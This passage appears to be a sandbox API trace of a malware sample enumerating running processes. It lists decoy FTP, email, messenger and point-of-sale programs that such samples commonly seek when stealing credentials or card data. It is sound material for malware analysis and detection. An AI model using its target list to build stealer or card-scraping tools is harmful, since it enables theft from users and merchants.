hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0167.607] lstrlenW (lpString="SearchUI.exe") returned 12 [0167.607] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0167.607] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0167.607] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0167.608] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0167.608] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending_windsor_bouquet.exe")) returned 1 [0167.608] lstrlenW (lpString="pending_windsor_bouquet.exe") returned 27 [0167.608] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers.exe")) returned 1 [0167.609] lstrlenW (lpString="workers.exe") returned 11 [0167.609] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed.exe")) returned 1 [0167.610] lstrlenW (lpString="succeed.exe") returned 11 [0167.610] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="washer jar.exe")) returned 1 [0167.610] lstrlenW (lpString="washer jar.exe") returned 14 [0167.610] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights_attending_other.exe")) returned 1 [0167.611] lstrlenW (lpString="nights_attending_other.exe") returned 26 [0167.611] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="useful_courts.exe")) returned 1 [0167.611] lstrlenW (lpString="useful_courts.exe") returned 17 [0167.611] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="compounds spanish.exe")) returned 1 [0167.612] lstrlenW (lpString="compounds spanish.exe") returned 21 [0167.612] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="look-albuquerque-left.exe")) returned 1 [0167.612] lstrlenW (lpString="look-albuquerque-left.exe") returned 25 [0167.612] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="try.exe")) returned 1 [0167.613] lstrlenW (lpString="try.exe") returned 7 [0167.613] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="statuteide.exe")) returned 1 [0167.613] lstrlenW (lpString="statuteide.exe") returned 14 [0167.613] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0167.614] lstrlenW (lpString="invite.exe") returned 10 [0167.614] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="register voluntary fluid.exe")) returned 1 [0167.657] lstrlenW (lpString="register voluntary fluid.exe") returned 28 [0167.657] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="cope finances ringtones.exe")) returned 1 [0167.658] lstrlenW (lpString="cope finances ringtones.exe") returned 27 [0167.658] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="modules_recommend.exe")) returned 1 [0167.658] lstrlenW (lpString="modules_recommend.exe") returned 21 [0167.658] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazinedeletecomparisons.exe")) returned 1 [0167.659] lstrlenW (lpString="magazinedeletecomparisons.exe") returned 29 [0167.659] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.659] lstrlenW (lpString="svchost.exe") returned 11 [0167.659] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0167.660] lstrlenW (lpString="3dftp.exe") returned 9 [0167.660] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0167.660] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0167.660] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0167.661] lstrlenW (lpString="alftp.exe") returned 9 [0167.661] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0167.662] lstrlenW (lpString="barca.exe") returned 9 [0167.662] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0167.663] lstrlenW (lpString="bitkinex.exe") returned 12 [0167.663] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0167.664] lstrlenW (lpString="coreftp.exe") returned 11 [0167.664] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0167.664] lstrlenW (lpString="far.exe") returned 7 [0167.665] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0167.666] lstrlenW (lpString="filezilla.exe") returned 13 [0167.666] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0167.667] lstrlenW (lpString="flashfxp.exe") returned 12 [0167.667] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0167.668] lstrlenW (lpString="fling.exe") returned 9 [0167.668] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0167.669] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0167.669] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0167.670] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0167.670] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0167.671] lstrlenW (lpString="icq.exe") returned 7 [0167.671] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0167.672] lstrlenW (lpString="leechftp.exe") returned 12 [0167.672] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0167.673] lstrlenW (lpString="ncftp.exe") returned 9 [0167.673] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0167.673] lstrlenW (lpString="notepad.exe") returned 11 [0167.673] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0167.674] lstrlenW (lpString="operamail.exe") returned 13 [0167.674] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0167.675] lstrlenW (lpString="pidgin.exe") returned 10 [0167.675] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0167.676] lstrlenW (lpString="scriptftp.exe") returned 13 [0167.676] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0167.677] lstrlenW (lpString="skype.exe") returned 9 [0167.677] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0167.678] lstrlenW (lpString="smartftp.exe") returned 12 [0167.678] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0167.679] lstrlenW (lpString="thunderbird.exe") returned 15 [0167.679] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0167.680] lstrlenW (lpString="totalcmd.exe") returned 12 [0167.680] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0167.681] lstrlenW (lpString="trillian.exe") returned 12 [0167.681] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0167.682] lstrlenW (lpString="webdrive.exe") returned 12 [0167.682] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0167.682] lstrlenW (lpString="whatsapp.exe") returned 12 [0167.682] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0167.683] lstrlenW (lpString="winscp.exe") returned 10 [0167.683] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0167.684] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0167.684] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0167.685] lstrlenW (lpString="active-charge.exe") returned 17 [0167.685] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0167.686] lstrlenW (lpString="accupos.exe") returned 11 [0167.686] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0167.686] lstrlenW (lpString="afr38.exe") returned 9 [0167.686] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0167.687] lstrlenW (lpString="aldelo.exe") returned 10 [0167.687] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0167.688] lstrlenW (lpString="ccv_server.exe") returned 14 [0167.688] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0167.689] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0167.689] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0167.689] lstrlenW (lpString="creditservice.exe") returned 17 [0167.689] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0167.690] lstrlenW (lpString="edcsvr.exe") returned 10 [0167.690] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0167.691] lstrlenW (lpString="fpos.exe") returned 8 [0167.691] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0167.692] lstrlenW (lpString="isspos.exe") returned 10 [0167.692] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0167.737] lstrlenW (lpString="mxslipstream.exe") returned 16 [0167.738] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1010, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0167.738] lstrlenW (lpString="omnipos.exe") returned 11 [0167.739] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0167.739] lstrlenW (lpString="spcwin.exe") returned 10 [0167.739] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0167.740] lstrlenW (lpString="spgagentservice.exe") returned 19 [0167.740] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0167.741] lstrlenW (lpString="utg2.exe") returned 8 [0167.741] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1060, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_community.exe")) returned 1 [0167.742] lstrlenW (lpString="lb_community.exe") returned 16 [0167.742] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="miniature.exe")) returned 1 [0167.743] lstrlenW (lpString="miniature.exe") returned 13 [0167.743] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="humanity-volumes-enables.exe")) returned 1 [0167.744] lstrlenW (lpString="humanity-volumes-enables.exe") returned 28 [0167.744] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operation-environments.exe")) returned 1 [0167.745] lstrlenW (lpString="operation-environments.exe") returned 26 [0167.745] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0167.746] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0167.746] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0167.747] lstrlenW (lpString="taskhostw.exe") returned 13 [0167.747] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0167.747] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0167.747] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0167.748] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0167.748] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12b0, pcPriClassBase=6, 